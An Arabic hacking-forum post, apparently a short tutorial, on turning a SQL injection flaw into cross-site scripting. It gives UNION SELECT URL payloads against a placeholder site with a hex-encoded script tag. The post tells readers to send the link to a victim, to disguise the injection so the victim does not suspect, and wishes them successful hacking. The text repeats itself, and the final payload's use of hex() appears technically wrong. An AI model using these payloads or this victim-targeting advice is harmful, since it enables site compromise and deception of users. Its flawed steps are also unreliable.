العلاقة ما بين SQL injection & XSS
السلام عليكم ،
الجميع يعرف الحقن والثغرة الاخرىى ولكن هل يمكننا استغلال ثغرة الحقن لتوليد xss يمكن ذلك ولكن بعدة شروط ،
الشرط الاول :
- ظهور الاعمدة المصابة في الصفحة مثلا 1و2و3 ....
الشرط الثاني:
- دالة hex تكون غير محظورة لاننا سنتغلها لحقن كود الجافا،
نأتي للطريقة :
مثلا لديك رابط حقن في الموقع
نستبدل الرقم 1 الاخير بدالة hex
ونشفر الكود **********alert('9');</script> بستخدام اي موقع تشفير او اضافة firefox المسماة hackbar
انا شفرتها لكم :
يصبح رابط xss الذي سترسله للضحية بالشكل التالي
طبعا يمكنك ان تعمل عملية url encode لتعليمات union +select الإخفائها حتى لا يشك الضحية ،
في الختام اختراق موفق ،
اذا عجبك الموضوع قيمني
الجميع يعرف الحقن والثغرة الاخرىى ولكن هل يمكننا استغلال ثغرة الحقن لتوليد xss يمكن ذلك ولكن بعدة شروط ،
الشرط الاول :
- ظهور الاعمدة المصابة في الصفحة مثلا 1و2و3 ....
الشرط الثاني:
- دالة hex تكون غير محظورة لاننا سنتغلها لحقن كود الجافا،
نأتي للطريقة :
مثلا لديك رابط حقن في الموقع
كود:
http://www.site.com/index.php?id=-1+union+select+1--ونشفر الكود **********alert('9');</script> بستخدام اي موقع تشفير او اضافة firefox المسماة hackbar
انا شفرتها لكم :
كود:
0x3c7363726970743e616c6572742839293b3c2f7363726970743e
كود:
http://www.site.com/index.php?id=-1+union+select+hex(0x3c7363726970743e616c6572742839293b3c2f7363726970743e)--في الختام اختراق موفق ،
اذا عجبك الموضوع قيمني
التعديل الأخير بواسطة المشرف:
اسم الموضوع : العلاقة ما بين SQL injection & XSS
|
المصدر : SQL قواعد البيانات
